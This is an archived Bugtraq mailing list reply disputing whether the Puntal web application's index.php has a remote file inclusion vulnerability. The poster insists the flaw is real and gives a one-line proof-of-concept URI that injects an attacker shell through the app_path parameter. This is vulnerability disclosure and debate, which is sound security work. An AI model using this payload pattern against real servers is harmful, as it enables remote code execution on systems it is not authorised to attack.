Bugtraq mailing list archives
Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities
From: donald00 () live com
Date: Mon, 3 May 2010 18:09:44 -0600
sorry Tom , in which line which confirms that the variable "app_path" and "puntal_path" is defined with functions to protect and handle inclusion or accessing to or from index.php file ? please check again or Read the full script code in index.php file , and then please seen or check The example URI / P0C for this issue. For verified or proofed this Vulnerabilities , I just Install Puntal , and this exploits is working. http://localhost//path/index.php?app_path= <attacker shell>
Current thread:
- Puntal (index.php) Remote File Inclusion Vulnerabilities eidelweiss (May 03)
- RE: Puntal (index.php) Remote File Inclusion Vulnerabilities Tom Walsh - lists (May 03)
- Re: Puntal (index.php) Remote File Inclusion Vulnerabilities Justin C. Klein Keane (May 04)
- <Possible follow-ups>
- Re: RE: Puntal (index.php) Remote File Inclusion Vulnerabilities donald00 (May 04)
- RE: Puntal (index.php) Remote File Inclusion Vulnerabilities Tom Walsh - lists (May 03)